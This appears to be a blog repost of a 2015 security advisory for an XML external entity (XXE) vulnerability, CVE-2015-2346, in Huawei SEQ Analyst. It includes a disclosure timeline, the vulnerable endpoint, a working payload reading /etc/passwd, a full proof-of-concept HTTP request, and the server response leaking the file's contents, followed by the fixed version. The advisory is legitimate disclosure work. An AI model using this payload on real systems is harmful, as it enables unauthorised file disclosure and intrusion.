Huawei SEQ Analyst – XML External Entity Injection (XXE) Vulnerability (CVE-2015-2346)

Posted on Updated on

#Document Title:
 ==============
 Huawei SEQ Analyst – XML External Entity Injection (XXE)
 
#Release Date:
 ===========
 15 Apr 2015





#CVE-ID:
 =======
 CVE-2015-2346

#Product & Service Introduction:
 ==============================
 SEQ Analyst is a platform for business quality monitoring and management by individual user and multiple vendors in a quasi-realtime and retraceable manner
 More Details & Manual ; http://download.huawei.com/download/filedownload.do?modelID=bulletin&refID=IN0000056669,101  

#Vulnerability Disclosure Timeline:
 =================================
 3 Mar 2015     Bug reported to the vendor.
 6 Mar 2015     Vendor returned ; investigating
 16 Mar 2015   Asked about the case.
 16 Mar 2015   Vendor has validated the issue.
 17 Mar 2015   There aren’t any fix the issue.
 18 Mar 2015   CVE number assigned
 15 Apr 2015    Fixed

#Affected Product(s):
 ===================
 Huawei Technologies Co. Ltd.
 Product: Huawei SEQ Analyst V200R002C03LG0001SPC100 (other versions may be vulnerable) 

#Exploitation Technique:
 ======================
 Local, Authenticated

#Technical Details:
 =================
 Target Path: /monitor/flexdata.action
 Sample Payload : <!DOCTYPE foo [<!ENTITY xxe00c70 SYSTEM “file:///etc/passwd”> ]>
 Affected Parameter: req 

#Proof of Concept (PoC):
 ======================
 https://drive.google.com/file/d/0B-LWHbwdK3P9YnVvYXFFZWZKc0k/view?usp=sharing  

Request:

 POST /monitor/flexdata.action HTTP/1.1
 Host: ***:8443
 User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 DNT: 1
 Cookie: JSESSIONID=C07AC243148F4C6F7677E90C1085C2D3;
 org.springframework.web.servlet.i18n.CookieLocaleResolver.LOCALE=en_US; locale=en_US; locked=false;
 timeNum=1425365144829; timeState=true; loginUserName=testsms; CASTGC=TGT-549-
 skiUgOJowwMXhTwxQ4bH1iHB2XKWmKcJVLJYIlthZ56kqJ9yAZ-cas; lockScreen=false
 Connection: keep-alive
 Referer: https://***:8443/monitor/flexrelease/AllNetMonitor.swf/%5B%5BDYNAMIC%5D%5D/5
 Content-type: application/x-www-form-urlencoded
 Content-Length: 136

 req=<!DOCTYPE%20foo%20[<!ENTITY%20xxe00c70%20SYSTEM%20″file%3a%2f%2f%2fetc%2fpasswd”>%20]><Req>%0a%20%20<c
 ommand>bizLicenseSetting%26xxe00c70%3b<%2fcommand>%0a<%2fReq>&rdm=Tue%20Mar%203%2008%3A45%3A50%20GMT%2B020
 0%202015

Response:

 HTTP/1.1 200 OK
 Date: Tue, 03 Mar 2015 06:46:29 GMT
 Server: Apache-Coyote/1.1
 Cache- Control: no- cache, no-store
 Content-Type: text/html;charset=utf-8
 Content-Language: en-US
 Vary: Accept-Encoding
 Keep-Alive: timeout=5, max=100
 Connection: Keep-Alive
 Content-Length: 4281
 <html>
 <head>
 <style type=”text/css”>
 …
 <tr class=”row_even”>
 <td class=”cell_object”>1</td>
 <td class=”cell_object”>2〕Command is
 bizLicenseSettingnobody:x:65534:65533:nobody:/var/lib/nobody:/bin/false
 bin:x:1:1:bin:/bin:/bin/false
 daemon:x:2:2:Daemon:/sbin:/bin/false
 ftp:x:40:49:FTP account:/srv/ftp:/bin/false
 root:x:0:0:root:/root:/bin/bash
 messagebus:x:103:101:User for D-Bus:/var/run/dbus:/bin/false
 ntp:x:74:102:NTP daemon:/var/lib/ntp:/bin/false
 ftpsecure:x:104:65534:Secure FTP User:/var/lib/empty:/bin/false
 polkituser:x:105:103:PolicyKit:/var/run/PolicyKit:/bin/false
 haldaemon:x:106:104:User for haldaemon:/var/run/hald:/bin/false
 sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false
 webserver:x:360:1800::/home/webserver:/bin/bash
 ecmftp:x:1000:1800::/opt/pub/software:/bin/bash
 ftptest:x:1001:1800::/opt/webserver/workspaces/ftp:/bin/bash
 httpd:x:361:1801::/home/httpd:/bin/bash
 cognos:x:1002:1802::/home/cognos:/bin/bash
 ftptrace:x:1003:1800::/opt/webserver/workspaces/ftp/traceserver:/bin/bash
 ftpsoc:x:1004:1800::/opt/pub/software:/bin/bash
 ftprtmu:x:1005:1800::/opt/webserver/workspaces/ftp/rtmu:/bin/bash</td>
 </tr>
 <tr class=”row_odd”>
 … 

#Solution Fix & Patch:
 ====================
 15 Apr 2015    Fixed version ==> SEQ Analyst V200R002C03LG0001CP0022

#Credits & Authors:
 =================
 Ugur Cihan Koc
 @_uceka_
 http://www.uceka.com

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s